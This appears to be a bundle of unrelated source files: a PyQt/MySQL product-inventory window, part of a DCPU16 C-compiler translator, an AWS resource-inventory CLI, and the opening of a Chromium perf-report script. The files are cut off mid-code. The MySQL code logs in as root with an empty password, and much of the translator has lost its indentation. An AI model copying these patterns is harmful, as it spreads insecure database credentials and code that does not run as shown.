        # Form fields (same captions/positions/validators as before).
        self.prodcodelabel, self.prodcodebox = self._make_field('Product Code: ', 45, 220)
        self.prodnamelabel, self.prodnamebox = self._make_field('Product Name: ', 45, 270)
        self.prodqtylabel, self.prodqtybox = self._make_field('QTY: ', 45, 320, numeric=True)
        self.prodpricelabel, self.prodpricebox = self._make_field('Product Price: ', 45, 370, numeric=True)

        self.addbutton = QPushButton('Add', self)
        self.addbutton.setStyleSheet(self._BUTTON_STYLE)
        self.addbutton.move(75, 430)
        self.addbutton.clicked.connect(self.Add)

    # ----------------------Function for Adding Products to the Database----
    def Add(self):
        """Insert a new product into the ``products`` table.

        Refuses blank fields and duplicate product codes; otherwise
        inserts the row and confirms via a dialog.
        """
        product_code = self.prodcodebox.text()
        product_name = self.prodnamebox.text()
        product_qty = self.prodqtybox.text()
        product_price = self.prodpricebox.text()

        # Reject the submission as soon as any field is blank.
        if not all((product_code, product_name, product_qty, product_price)):
            self._notify("Do not leave an empty field", "Cannot add the product")
            return

        connection = pymysql.connect(host='localhost',
                                     user='root',
                                     password='',
                                     db='danasdb',
                                     charset='utf8mb4',
                                     cursorclass=pymysql.cursors.DictCursor,
                                     port=3306)
        try:
            with connection.cursor() as cursor:
                # execute() returns the number of matching rows.
                exists = cursor.execute(
                    'select * from products where product_code = %s;', (product_code,))
                if exists:
                    self._notify("Product already exist!", "Cannot add the product")
                    return
                # QIntValidator guarantees qty/price are digit strings here.
                cursor.execute('insert into products values(%s,%s,%s,%s);',
                               (product_code, product_name,
                                int(product_qty), int(product_price)))
            connection.commit()
        finally:
            connection.close()
        self._notify("Successfully added", "Product added")
    # -----------------------END OF Function for Adding Products to the Database----------------------
class Viewproducts(QWidget):
    """Window that lists every row of the `products` table in a read-only
    QTableWidget."""

    def __init__(self):
        super().__init__()
        self.title = 'PRODUCTS LIST'  # Window Title
        self.initUI()

    def initUI(self):
        """Build the window, query the products table and fill the grid."""
        self.setWindowTitle(self.title)
        self.setGeometry(260, 100, 600, 525)  # Window Size
        # Font for QPushButton, QLabel and QLineEdit in this window.
        self.setStyleSheet(
            'QPushButton,QLabel,QLineEdit {font: 10pt Doppio One}')
        self.setFixedSize(self.size())
        self.setWindowIcon(QIcon(r'C:\Users\XcomPh\Desktop\New folder (2)\ProjectDanas\Media Files\winicon.png'))
        # Background
        self.BackgroundHolder = QLabel(self)
        self.Background = QPixmap(r'C:\Users\XcomPh\Desktop\New folder (2)\ProjectDanas\Media Files\winbackground.png')
        self.BackgroundHolder.setPixmap(self.Background)
        self.BackgroundHolder.move(0, 0)
        self.BackgroundHolder.resize(795, 525)
        self.BackgroundHolder.setScaledContents(True)
        # Connects Python to Mysql
        connection = pymysql.connect(host='localhost',
                                     user='root',
                                     password='',
                                     db='danasdb',
                                     charset='utf8mb4',
                                     cursorclass=pymysql.cursors.DictCursor,
                                     port=3306)
        try:
            with connection.cursor() as cursor:
                # execute() returns the row count, so one query is enough
                # (the original ran the same SELECT twice).
                numberofproducts = cursor.execute('SELECT * from products;')
                # Creates the product table
                columns = ['product_code', 'product_name', 'product_qty',
                           'product_price']
                self.tableWidget = QTableWidget()
                # BUGFIX: size the table to the data instead of a hard-coded
                # 10 rows, which silently dropped products past the tenth.
                self.tableWidget.setRowCount(numberofproducts)
                self.tableWidget.setColumnCount(len(columns))
                # Makes the table non-editable
                self.tableWidget.setEditTriggers(QAbstractItemView.NoEditTriggers)
                self.tableWidget.verticalHeader().setVisible(False)  # Hides Vertical Headers
                self.tableWidget.setHorizontalHeaderLabels(columns)
                self.tableWidget.setMaximumWidth(450)
                self.tableWidget.setMaximumHeight(300)
                self.layout = QVBoxLayout()
                self.layout.addWidget(self.tableWidget)
                self.setLayout(self.layout)
                # ---Transfer information from DB to GUI---------------
                for i in range(numberofproducts):
                    productinfo = cursor.fetchone()
                    for col, key in enumerate(columns):
                        self.tableWidget.setItem(
                            i, col, QTableWidgetItem('{}'.format(productinfo[key])))
        finally:
            # The original never closed the connection.
            connection.close()
        self.show()
if __name__ | |
<filename>cc/translator.py
from cc.ast import *
from cc.parser import Parser
from .assembler import *
class Translator:
"""
Will translate the AST into DCPU16 code
We use the ABI asm specified here:
https://github.com/0x10cStandardsCommittee/0x10c-Standards/blob/master/ABI/ABI%20draft%202.txt
"""
def __init__(self, ast):
self._ast = ast # type: Parser
self._asm = Assembler()
# Function compilation state
self._regs = [Reg.I, Reg.Z, Reg.Y, Reg.X, Reg.C, Reg.B, Reg.A]
self._to_restore = []
self._save_on_call = []
self._return_pos = []
self._stack = 0
self._params = []
self._vars = []
# For break and continue
self._cond_label = []
self._end_label = []
def clear(self):
"""
Clear the compilation state
"""
self._regs = [Reg.I, Reg.Z, Reg.Y, Reg.X, Reg.C, Reg.B, Reg.A]
self._to_restore.clear()
self._save_on_call.clear()
self._return_pos.clear()
self._stack = 0
self._params.clear()
self._vars.clear()
    def _can_resolve_to_operand_without_deref(self, expr):
        """Return truthy when *expr* can be encoded directly as a single
        operand that needs no memory dereference (a literal, a register,
        or a register+constant Offset).

        NOTE(review): the ExprBinary branch calls _translate_expr(..., None),
        which is assumed to emit no code for operand-resolvable
        subexpressions -- confirm before reordering calls to this predicate.
        Expression kinds not listed here fall off the end and return None,
        which callers treat as False.
        """
        if isinstance(expr, ExprNumber):
            # A plain literal is always a valid immediate operand.
            return True
        elif isinstance(expr, ExprComma):
            # A comma expression resolves to its last element.
            return self._can_resolve_to_operand_without_deref(expr.exprs[-1])
        elif isinstance(expr, ExprIdent):
            typ = expr.resolve_type(self._ast)
            # These are resolved to a pointer on the stack so we can resolve them to an operand
            if isinstance(typ, CArray) or isinstance(typ, CStruct):
                return True
            elif isinstance(expr.ident, VariableIdentifier) and isinstance(self._get_var(expr.ident.index), Reg):
                # If this is a variable which is inside a register it will not need a deref
                return True
            elif isinstance(expr.ident, ParameterIdentifier) and isinstance(self._get_param(expr.ident.index), Reg):
                # If this is a parameter which is inside a register it will not need a deref
                return True
            else:
                return False
        elif isinstance(expr, ExprBinary):
            if self._can_resolve_to_operand_without_deref(expr.left) and self._can_resolve_to_operand_without_deref(expr.right):
                left = self._translate_expr(expr.left, None)
                right = self._translate_expr(expr.right, None)
                # An Offset combined with an int constant folds into one operand.
                if isinstance(left, Offset) and isinstance(right, int) or \
                        isinstance(right, Offset) and isinstance(left, int):
                    return True
                else:
                    return False
        elif isinstance(expr, ExprCast):
            # A cast does not change where the value lives.
            return self._can_resolve_to_operand_without_deref(expr.expr)
        elif isinstance(expr, ExprAddrof):
            return True
    def _can_resolve_to_operand(self, expr):
        """Return True when *expr* can be encoded as a single operand,
        possibly including one memory dereference.

        Extends _can_resolve_to_operand_without_deref with reg/const
        arithmetic, plain identifiers, and derefs of operand-resolvable
        subexpressions.

        NOTE(review): the ExprBinary branch calls _translate_expr(..., None),
        assumed side-effect free for these shapes -- confirm before reuse.
        """
        if self._can_resolve_to_operand_without_deref(expr):
            return True
        elif isinstance(expr, ExprBinary):
            if self._can_resolve_to_operand_without_deref(expr.left) and self._can_resolve_to_operand_without_deref(expr.right):
                left = self._translate_expr(expr.left, None)
                right = self._translate_expr(expr.right, None)
                # Offset+const always folds; a bare register only folds with
                # an int constant under + or -.
                if isinstance(left, Offset) and isinstance(right, int) or \
                        isinstance(right, Offset) and isinstance(left, int) or \
                        isinstance(left, Reg) and isinstance(right, int) and expr.op in '-+' or \
                        isinstance(right, Reg) and isinstance(left, int) and expr.op in '-+':
                    return True
                else:
                    return False
        elif isinstance(expr, ExprCast):
            return self._can_resolve_to_operand(expr.expr)
        elif isinstance(expr, ExprIdent):
            return True
        elif isinstance(expr, ExprComma):
            return self._can_resolve_to_operand(expr.exprs[-1])
        elif isinstance(expr, ExprDeref):
            # A deref of an operand-resolvable value becomes [operand].
            if self._can_resolve_to_operand_without_deref(expr.expr):
                return True
        return False
    def _get_param(self, i):
        """Location (Reg or stack Offset) assigned to parameter *i*."""
        return self._params[i]
    def _get_var(self, i):
        """Location (Reg or stack Offset) assigned to local variable *i*."""
        return self._vars[i]
def _alloc_scratch(self):
if len(self._regs) == 0:
# if out of registers allocate a scratch on the stack
return self._alloca(2)
else:
reg = self._regs.pop()
if reg in [Reg.J, Reg.Z, Reg.Y, Reg.X] and reg not in self._to_restore:
self._to_restore.append(reg)
if reg in [Reg.A, Reg.B, Reg.C] and reg not in self._save_on_call:
self._save_on_call.append(reg)
return reg
def _free_scratch(self, reg: Reg):
if isinstance(reg, Offset):
# If this is a spilled register then append it
# to the start of the list, so it will have least
# priority on allocation
self._regs.insert(0, reg)
else:
# TODO: put A, B and C first to allocation
self._regs.append(reg)
# Remove from caller saved registers if in it
if reg in self._save_on_call:
self._save_on_call.remove(reg)
def _set_scratch(self, reg: Reg):
# force uses are not put in the restore or save on regcall
# the function is supposed to make sure it will all work
if reg in self._regs:
self._regs.remove(reg)
def _alloca(self, size):
self._stack += size
return Offset(Reg.J, -self._stack)
    def get_instructions(self):
        """Return the instructions accumulated by the assembler so far."""
        return self._asm.get_instructions()
def translate(self):
for func in self._ast.func_list:
if func.prototype:
# Declare asm an external symbol
self._asm.put_instruction(f'.extern {func.name}')
else:
self._translate_function(func)
for var in self._ast.global_vars:
# TODO: support constant value for global vars
if var.storage == StorageClass.EXTERN:
# Declare as an external symbol
self._asm.put_instruction(f'.extern {var.ident.name}')
else:
# Declare asm a global symbol if not a static variable
if var.storage != StorageClass.STATIC:
self._asm.put_instruction(f'.global {var.ident.name}')
self._asm.mark_label(f'{var.ident.name}')
if var.value is not None:
# Has a value!
if isinstance(var.value, int):
self._asm.emit_word(var.value)
else:
assert False, f'got {var.value}'
else:
# Does not have a value, reset to 0
for i in range(var.typ.sizeof()):
self._asm.emit_word(0)
    def _translate_function(self, func: Function):
        """Emit the complete body of *func*: label, prologue, parameter and
        local layout, the translated code, and one epilogue per recorded
        return position.

        The stack-adjust and callee-saved pushes are emitted *after* the
        body has been translated (by seeking back with set_pos), because
        self._stack and self._to_restore are only known afterwards.
        """
        # TODO: static functions
        # Clear and set the current function
        self.clear()
        self._ast.func = func
        # label
        self._asm.put_instruction('')
        if func.storage_decl != StorageClass.STATIC:
            self._asm.put_instruction(f'.global {func.name}')
        self._asm.mark_label(func.name)
        # Function entry frame: save old frame pointer, J becomes the frame base.
        self._asm.emit_set(Push(), Reg.J)
        self._asm.emit_set(Reg.J, Reg.SP)
        # setup function argument position
        if func.type.callconv == CallConv.STACKCALL:
            # For stack call all regs are passed on the stack
            # (offset 2 skips the saved J and the return address).
            off = 2
            for param in func.type.param_types:
                sz = param.sizeof()
                self._params.append(Offset(Reg.J, off))
                off += sz
        elif func.type.callconv == CallConv.REGCALL:
            # For regcall the first free parameters are in A, B and C
            # The rest are passed on the stack
            regs = [Reg.C, Reg.B, Reg.A]
            off = 2
            for param in func.type.param_types:
                if len(regs) != 0:
                    r = regs.pop()
                    # Reserve the ABI register so scratch allocation skips it.
                    self._set_scratch(r)
                    self._params.append(r)
                else:
                    sz = param.sizeof()
                    self._params.append(Offset(Reg.J, off))
                    off += sz
        else:
            assert False
        # Set up local vars
        if len(func.vars) != 0:
            for var in func.vars:
                if var.storage == StorageClass.AUTO:
                    loc = self._alloca(var.typ.sizeof())
                elif var.storage == StorageClass.REGISTER:
                    # Can only do this for register sized stuff
                    if (isinstance(var.typ, CInteger) and var.typ.bits == 16) or \
                            isinstance(var.typ, CPointer) or \
                            isinstance(var.typ, CFunction):
                        loc = self._alloc_scratch()
                    else:
                        loc = self._alloca(var.typ.sizeof())
                elif var.storage == StorageClass.STATIC:
                    # TODO: This is just a global variable
                    assert False
                else:
                    assert False
                self._vars.append(loc)
        # Store place for locals -- placeholder back-patched below once the
        # final frame size and callee-saved set are known.
        locals_pos = self._asm.get_pos()
        self._asm.put_instruction(f';; Locals allocation here')
        # space for saving local regs
        # (X, Y, Z, I)
        for i in range(4):
            self._asm.put_instruction(';; For callee saved stuff')
        # Translate function
        self._translate_expr(func.code, None)
        # Push callee saved and allocate stack area
        # also generate the end code that reverts all of that
        self._asm.set_pos(locals_pos)
        if self._stack > 0:
            self._asm.emit_sub(Reg.SP, self._stack)
        for reg in self._to_restore:
            self._asm.emit_set(Push(), reg)
        # Create all the function frame ends
        for pos in self._return_pos:
            self._asm.set_pos(pos)
            # Restore callee-saved regs in reverse push order.
            for reg in self._to_restore[::-1]:
                self._asm.emit_set(reg, Pop())
            self._asm.emit_set(Reg.SP, Reg.J)
            self._asm.emit_set(Reg.J, Pop())
            self._asm.emit_set(Reg.PC, Pop())
def _translate_expr(self, expr: Expr, dest):
if isinstance(expr, ExprNumber):
if dest is None:
return expr.value
else:
self._asm.emit_set(dest, expr.value)
elif isinstance(expr, ExprBreak):
self._asm.emit_set(Reg.PC, self._end_label[-1])
elif isinstance(expr, ExprContinue):
self._asm.emit_set(Reg.PC, self._cond_label[-1])
elif isinstance(expr, ExprLoop):
assert dest is None
end_lbl = self._asm.make_label()
self._end_label.append(end_lbl)
# The condition
cond_lbl = self._asm.make_and_mark_label()
self._cond_label.append(cond_lbl)
if self._can_resolve_to_operand(expr.cond):
cond_result = self._translate_expr(expr.cond, None)
else:
cond_result = self._alloc_scratch()
self._translate_expr(expr.cond, cond_result)
self._asm.emit_ife(cond_result, 0)
self._asm.emit_set(Reg.PC, end_lbl)
if not self._can_resolve_to_operand(expr.cond):
self._free_scratch(cond_result)
# The body
self._translate_expr(expr.body, None)
self._asm.emit_set(Reg.PC, cond_lbl)
# Mark the end
self._asm.mark_label(end_lbl)
elif isinstance(expr, ExprBinary):
print(f'{expr}')
# Setup the type
typ = expr.resolve_type(self._ast)
if isinstance(typ, CInteger):
assert typ.bits == 16, "Only 16bit math is natively supported"
elif isinstance(typ, CPointer) or isinstance(typ, CArray):
typ = CInteger(16, False)
else:
assert False, f'`{typ}` ({type(typ)})'
if dest is None:
# Sometimes we can find && because of `if`
if expr.op == '&&':
end = self._asm.make_label()
# Run the first part, jump to end if the result is 0
if self._can_resolve_to_operand(expr.left):
reg = self._translate_expr(expr.left, None)
self._asm.emit_ife(reg, 0)
self._asm.emit_set(Reg.PC, end)
else:
reg = self._alloc_scratch()
self._translate_expr(expr.left, reg)
self._asm.emit_ife(reg, 0)
self._asm.emit_set(Reg.PC, end)
self._free_scratch(reg)
self._translate_expr(expr.right, None)
self._asm.mark_label(end)
else:
# This allows for doing maths on operands at compile time
left = self._translate_expr(expr.left, None)
right = self._translate_expr(expr.right, None)
if isinstance(left, Offset) and isinstance(right, int):
return Offset(left.a, eval(f'{left.offset} {expr.op} {right}'))
elif isinstance(right, Offset) and isinstance(left, int):
return Offset(right.a, eval(f'{right.offset} {expr.op} {left}'))
elif isinstance(left, Reg) and isinstance(right, int):
return Offset(left, right if expr.op == '+' else -right)
elif isinstance(right, Reg) and isinstance(left, int):
return Offset(right, left if expr.op == '+' else -left)
else:
assert False, f'`{expr}` -> `{left}` and `{right}`'
else:
if expr.op in '+-*/%&|^':
# For these it is worth more to eval to the dest
# Translate the left side on the result register
self._translate_expr(expr.left, dest)
# Translate the right to a temp one
if self._can_resolve_to_operand(expr.right):
reg = self._translate_expr(expr.right, None)
else:
reg = self._alloc_scratch()
self._translate_expr(expr.right, reg)
# Emit the addition, with dest asm the destination
if expr.op == '+':
self._asm.emit_add(dest, reg)
elif expr.op == '-':
self._asm.emit_sub(dest, reg)
elif expr.op == '*':
self._asm.emit_mul(dest, reg)
elif expr.op == '/':
if typ.signed:
self._asm.emit_dvi(dest, reg)
else:
self._asm.emit_div(dest, reg)
elif expr.op == '%':
if typ.signed:
self._asm.emit_mdi(dest, reg)
else:
self._asm.emit_mod(dest, reg)
elif expr.op == '&':
self._asm.emit_and(dest, reg)
elif expr.op == '|':
self._asm.emit_bor(dest, reg)
elif expr.op == '^':
self._asm.emit_xor(dest, reg)
else:
assert False
elif expr.op in ['==']:
# For these we should just allocate another register
self._alloc_scratch()
else:
assert False
| |
<reponame>zlish12/aws-inventory
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import argparse
import sys
import os
import logging
import boto3
import xlsxwriter
import datetime
from aws_exporter import __version__
from pprint import pprint
from prettytable import PrettyTable
__author__ = "Zlish"
__copyright__ = "Zlish"
__license__ = "mit"
_logger = logging.getLogger(__name__)
def get_platform(instance):
    """Return the instance's platform string, defaulting to 'Linux'.

    EC2 reports `platform` only for some platforms (e.g. Windows); None
    means Linux.  BUGFIX: the original implicitly returned None for any
    non-None platform instead of returning the platform itself.
    """
    platform = instance.platform
    if platform is None:
        return 'Linux'
    return platform
def get_security_groups(instance):
    """Return a comma-separated string of all security-group names.

    BUGFIX: the original returned inside the loop, reporting only the
    first group.  Returns None when the instance has no groups, matching
    the original behaviour for that case.
    """
    names = [group['GroupName'] for group in instance.security_groups]
    if not names:
        return None
    return ', '.join(names)
def get_security_groups_id(instance):
    """Return a comma-separated string of all security-group IDs.

    BUGFIX: the original returned inside the loop, reporting only the
    first group's ID.  Returns None for an instance with no groups,
    matching the original behaviour for that case.
    """
    ids = [group['GroupId'] for group in instance.security_groups]
    if not ids:
        return None
    return ', '.join(ids)
def get_instance_name(instance):
    """Return the value of the instance's 'Name' tag, or None.

    BUGFIX: uses exact key equality; the original substring test
    ('Name' in tag['Key']) also matched tags such as 'AppName'.  Also
    tolerates instances with no tags at all (tags is None).
    """
    for tag in instance.tags or []:
        if tag['Key'] == 'Name':
            return tag['Value']
    return None
def run_s3(args):
    """Print an inventory of all S3 buckets, optionally exporting to xlsx.

    BUGFIX: the original created and printed a new PrettyTable inside the
    loop (one single-row table per bucket); now one table lists them all,
    consistent with run_ec2.
    """
    # Create an S3 client
    s3 = boto3.client('s3')
    s3info = {}
    attributes_s3 = ['Bucket name']
    # Call S3 to list current buckets
    response = s3.list_buckets()
    t = PrettyTable(attributes_s3)
    # Get a list of all bucket names from the response
    for bucket in response['Buckets']:
        name = bucket['Name']
        s3info[name] = {
            'Bucket name': name,
        }
        t.add_row([name])
    print(t)
    if args.xlsx:
        export_s3_xlsx(s3info, attributes_s3, args)
def export_s3_xlsx(s3info, attributes_s3, args):
    """Write the S3 bucket inventory to the .xlsx file named by --file_name."""
    print("\n\nExporting following results to excel spreadsheet")
    print("--------------------------------------")
    print(",".join(attributes_s3))
    print("")
    # Allow user to input own file_name
    file_name = args.file_name
    if file_name is None:
        print("""
        Must enter file name
        --file_name <file_name>
        """)
        # BUGFIX: the original fell through and crashed on Workbook(None).
        return
    # Creates worksheet with user input
    workbook = xlsxwriter.Workbook(file_name)
    worksheet = workbook.add_worksheet('S3')
    # Add a bold format to use to highlight cells.
    bold = workbook.add_format({'bold': 1})
    # Adjust the column width.
    width = len("long text hidden test-1")
    worksheet.set_column(0, 1, width)
    worksheet.set_column(9, 1, width)
    # Write data headers.
    worksheet.write('A1', 'Bucket name', bold)
    # Start from the first cell. Rows and columns are zero indexed
    row = 1
    col = 0
    # Iterate over data and write it out row by row
    for buckets, bucket in s3info.items():
        worksheet.write(row, col, buckets)
        row += 1
    workbook.close()
def run_iam(args):
    """Print an inventory of IAM users, optionally exporting to xlsx.

    BUGFIX: the original created and printed a new PrettyTable inside the
    loop (one single-row table per user); now one table lists them all.
    """
    # Create IAM client
    iam = boto3.client('iam')
    iaminfo = {}
    attributes_iam = ['User name', 'User ID', 'ARN']
    t = PrettyTable(attributes_iam)
    for user in iam.list_users()['Users']:
        user_name = user['UserName']
        iaminfo[user_name] = {
            'User name': user_name,
            'User ID': user['UserId'],
            'ARN': user['Arn'],
        }
        t.add_row([user_name, user['UserId'], user['Arn']])
    print(t)
    if args.xlsx:
        export_iam_xlsx(iaminfo, attributes_iam, args)
def export_iam_xlsx(iaminfo, attributes_iam, args):
    """Write the IAM user inventory to the .xlsx file named by --file_name."""
    print("\n\nExporting following results to excel spreadsheet")
    print("--------------------------------------")
    print(",".join(attributes_iam))
    print("")
    # Allow user to input own file_name
    file_name = args.file_name
    if file_name is None:
        print("""
        Must enter file name
        --file_name <file_name>
        """)
        # BUGFIX: the original fell through and crashed on Workbook(None).
        return
    # Creates worksheet with user input
    workbook = xlsxwriter.Workbook(file_name)
    worksheet = workbook.add_worksheet('IAM')
    # Add a bold format to use to highlight cells.
    bold = workbook.add_format({'bold': 1})
    # Adjust the column width.
    width = len("long text hidden test-1")
    worksheet.set_column(0, 1, width)
    worksheet.set_column(9, 1, width)
    # Write data headers.  BUGFIX: the original wrote '<NAME>' placeholder
    # headers and read user['<NAME>'], which raised KeyError -- the dict
    # keys are 'User name' / 'User ID' / 'ARN'.
    worksheet.write('A1', 'User name', bold)
    worksheet.write('B1', 'User ID', bold)
    worksheet.write('C1', 'ARN', bold)
    # Start from the first cell. Rows and columns are zero indexed
    row = 1
    col = 0
    # Iterate over data and write it out row by row
    for user_name, user in iaminfo.items():
        worksheet.write(row, col, user_name)
        worksheet.write(row, col + 1, user['User ID'])
        worksheet.write(row, col + 2, user['ARN'])
        row += 1
    workbook.close()
def run_vpc(args):
    """Print an inventory of VPCs (CIDR, state, subnets), optionally
    exporting to xlsx.

    BUGFIX: the original rebound `subnets` to [] inside the loop and then
    iterated that same empty list, so no subnet was ever reported.  The
    describe_subnets() result is now kept separately and filtered per VPC.
    """
    client = boto3.client('ec2')
    vpcs = client.describe_vpcs()['Vpcs']
    all_subnets = client.describe_subnets()['Subnets']
    vpcinfo = {}
    attributes_vpc = ['Vpc Id', 'CIDR', 'State', 'Subnets']
    t = PrettyTable(attributes_vpc)
    for vpc in vpcs:
        vpc_id = vpc['VpcId']
        # Only the subnets that belong to this VPC.
        subnet_ids = [s['SubnetId'] for s in all_subnets
                      if s.get('VpcId') == vpc_id]
        vpcinfo[vpc_id] = {
            'Vpc Id': vpc_id,
            'CIDR': vpc['CidrBlock'],
            'State': vpc['State'],
            'Subnet Id': subnet_ids,
        }
        t.add_row([vpc_id, vpc['CidrBlock'], vpc['State'], subnet_ids])
    print(t)
    if args.xlsx:
        export_vpc_xlsx(vpcinfo, attributes_vpc, args)
def export_vpc_xlsx(vpcinfo, attributes_vpc, args):
    """Write the VPC inventory to the .xlsx file named by --file_name."""
    print("\n\nExporting following results to excel spreadsheet")
    print("--------------------------------------")
    print(",".join(attributes_vpc))
    print("")
    # Allow user to input own file_name
    file_name = args.file_name
    if file_name is None:
        print("""
        Must enter file name
        --file_name <file_name>
        """)
        # BUGFIX: the original fell through and crashed on Workbook(None).
        return
    # Creates worksheet with user input
    workbook = xlsxwriter.Workbook(file_name)
    worksheet = workbook.add_worksheet('VPC')
    # Add a bold format to use to highlight cells.
    bold = workbook.add_format({'bold': 1})
    # Adjust the column width.
    worksheet.set_column(0, 1, 18)
    worksheet.set_column(9, 1, 15)
    # Write data headers.
    worksheet.write('A1', 'Vpc Id', bold)
    worksheet.write('B1', 'CIDR', bold)
    worksheet.write('C1', 'State', bold)
    worksheet.write('D1', 'Subnet Id', bold)
    # Start from the first cell. Rows and columns are zero indexed
    row = 1
    col = 0
    # Iterate over data and write it out row by row
    for vpc_id, vpc in vpcinfo.items():
        worksheet.write(row, col, vpc_id)
        worksheet.write(row, col + 1, vpc['CIDR'])
        worksheet.write(row, col + 2, vpc['State'])
        worksheet.write_row(row, col + 3, vpc['Subnet Id'])
        row += 1
    workbook.close()
def all_regions(args):
    """Print one EC2 inventory table per AWS region.

    BUGFIX: the original open-coded the Name-tag scan and left `name`
    unbound (NameError) -- or stale from the previous instance -- when an
    instance had no 'Name' tag; it now reuses get_instance_name(), which
    also handles instances without tags.
    """
    client = boto3.client('ec2')
    regions = client.describe_regions()['Regions']
    attributes = ['Region', 'Name', 'Instance ID', 'Type', 'Platform',
                  'Security Group Name', 'Security Group ID', 'State']
    # Connect to EC2
    for region in regions:
        ec2 = boto3.resource('ec2', region_name=region['RegionName'])
        # Get information for all running instances
        running_instances = ec2.instances.filter(Filters=[{
            'Name': 'instance-state-name',
            'Values': ['running', 'stopped']}])
        ec2info = {}
        for instance in running_instances:
            # Add instance info to a dictionary
            ec2info[instance.id] = {
                'Region': region['RegionName'],
                'Name': get_instance_name(instance),
                'Instance ID': instance.id,
                'Type': instance.instance_type,
                'Platform': get_platform(instance),
                'Security Group Name': get_security_groups(instance),
                'Security Group ID': get_security_groups_id(instance),
                'State': instance.state['Name'],
            }
        t = PrettyTable(attributes)
        for instance_id, instance in ec2info.items():
            t.add_row([instance['Region'], instance['Name'], instance_id,
                       instance['Type'], instance['Platform'],
                       instance['Security Group Name'],
                       instance['Security Group ID'], instance['State']])
        print(t)
def run_ec2(args):
    """Inventory EC2 instances in the default region and print them as a
    table; optionally repeats for every region and/or exports to xlsx."""
    session = boto3.Session(
        aws_access_key_id=args.access_key,
        aws_secret_access_key=args.secret_key,
    )
    ec2 = session.resource('ec2')
    # Only instances that are running or stopped.
    state_filter = [{'Name': 'instance-state-name',
                     'Values': ['running', 'stopped']}]
    running_instances = ec2.instances.filter(Filters=state_filter)
    attributes_ec2 = ['Region', 'Name', 'Instance ID', 'Type', 'Platform',
                      'Security Group Name', 'Security Group ID', 'State']
    ec2info = {}
    for instance in running_instances:
        # Collect the displayed fields for this instance.
        ec2info[instance.id] = {
            'Region': instance.placement['AvailabilityZone'],
            'Name': get_instance_name(instance),
            'Instance ID': instance.id,
            'Type': instance.instance_type,
            'Platform': get_platform(instance),
            'Security Group Name': get_security_groups(instance),
            'Security Group ID': get_security_groups_id(instance),
            'State': instance.state['Name'],
        }
    # Render the collected inventory on stdout.
    table = PrettyTable(attributes_ec2)
    for instance_id, info in ec2info.items():
        table.add_row([info['Region'], info['Name'], instance_id,
                       info['Type'], info['Platform'],
                       info['Security Group Name'],
                       info['Security Group ID'], info['State']])
    print(table)
    if args.all_regions:
        all_regions(args)
    if args.xlsx:
        export_ec2_xlsx(ec2info, attributes_ec2, args)
def export_ec2_xlsx(ec2info, attributes_ec2, args):
    """Write the EC2 inventory to the .xlsx file named by --file_name."""
    print("\n\nExporting following results to excel spreadsheet")
    print("--------------------------------------")
    print(",".join(attributes_ec2))
    print("")
    # Allow user to input own file_name
    file_name = args.file_name
    if file_name is None:
        print("""
        Must enter file name
        --file_name <file_name>
        """)
        # BUGFIX: the original fell through and crashed on Workbook(None).
        return
    # Creates worksheet with user input
    workbook = xlsxwriter.Workbook(file_name)
    worksheet = workbook.add_worksheet('EC2')
    # Add a bold format to use to highlight cells.
    bold = workbook.add_format({'bold': 1})
    # Adjust the column width.
    worksheet.set_column(0, 1, 18)
    worksheet.set_column(9, 1, 15)
    # Write ec2 data headers.
    worksheet.write('A1', 'Region', bold)
    worksheet.write('B1', 'Name', bold)
    worksheet.write('C1', 'Instance ID', bold)
    worksheet.write('D1', 'Type', bold)
    worksheet.write('E1', 'Platform', bold)
    worksheet.write('F1', 'Security Group Name', bold)
    worksheet.write('G1', 'Security Group ID', bold)
    worksheet.write('H1', 'State', bold)
    # Start from the first cell. Rows and columns are zero indexed
    row = 1
    col = 0
    # Iterate over data and write it out row by row
    for instance_id, instance in ec2info.items():
        worksheet.write(row, col, instance['Region'])
        worksheet.write(row, col + 1, instance['Name'])
        worksheet.write(row, col + 2, instance_id)
        worksheet.write(row, col + 3, instance['Type'])
        worksheet.write(row, col + 4, instance['Platform'])
        worksheet.write(row, col + 5, instance['Security Group Name'])
        worksheet.write(row, col + 6, instance['Security Group ID'])
        worksheet.write(row, col + 7, instance['State'])
        row += 1
    workbook.close()
def parse_args(args):
    """Parse command line parameters

    Args:
      args ([str]): command line parameters as list of strings

    Returns:
      :obj:`argparse.Namespace`: command line parameters namespace
    """
    parser = argparse.ArgumentParser(description="AWS Exporter Tool")
    parser.add_argument(dest="aws_service_name",
                        help="AWS Service Name i.e. ec2, s3, elb")
    parser.add_argument('--version', action='version',
                        version='aws-exporter {ver}'.format(ver=__version__))
    parser.add_argument('-access_key', '--access_key', dest="access_key",
                        help="AWS Access Key ID")
    parser.add_argument('-secret_key', '--secret_key', dest="secret_key",
                        help="AWS Secret Key ID")
    parser.add_argument('-region', '--region', dest="region",
                        help="AWS Region", default='us-west-1')
    parser.add_argument('-all_regions', '--all_regions',
                        help="Outputs all AWS Regions", action='store_true')
    parser.add_argument('-xlsx', '--xlsx',
                        help="Export to excel spreadsheet",
                        action='store_true')
    parser.add_argument('-v', '--verbose', dest="loglevel",
                        help="set loglevel to INFO",
                        action='store_const', const=logging.INFO)
    parser.add_argument('-vv', '--very-verbose', dest="loglevel",
                        help="set loglevel to DEBUG",
                        action='store_const', const=logging.DEBUG)
    parser.add_argument('-file_name', '--file_name', dest="file_name",
                        help="Exports output to file")
    return parser.parse_args(args)
def setup_logging(loglevel):
    """Setup basic logging

    Args:
      loglevel (int): minimum loglevel for emitting messages
    """
    logging.basicConfig(
        level=loglevel,
        stream=sys.stdout,
        format="[%(asctime)s] %(levelname)s:%(name)s:%(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
    )
def | |
<filename>tools/fuchsia/comparative_tester/generate_perf_report.py
#!/usr/bin/env python3
# Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""generate_perf_report.py is to be used after comparative_tester.py has been
executed and written some test data into the location specified by
target_spec.py. It writes to results_dir and reads all present test info from
raw_data_dir. Using this script should just be a matter of invoking it from
chromium/src while raw test data exists in raw_data_dir."""
import json
import logging
import math
import os
import sys
from typing import List, Dict, Set, Tuple, Optional, Any, TypeVar, Callable
import target_spec
from test_results import (TargetResult, ReadTargetFromJson, TestResult,
ResultLine)
class LineStats(object):
  """Aggregated statistics for one recurring line of a test's output."""

  def __init__(self, desc: str, unit: str, time_avg: float, time_dev: float,
               cv: float, samples: int) -> None:
    """A corpus of stats about a particular line from a given test's output.

    Args:
      desc (str): Descriptive text of the line in question.
      unit (str): The units of measure that the line's result is in.
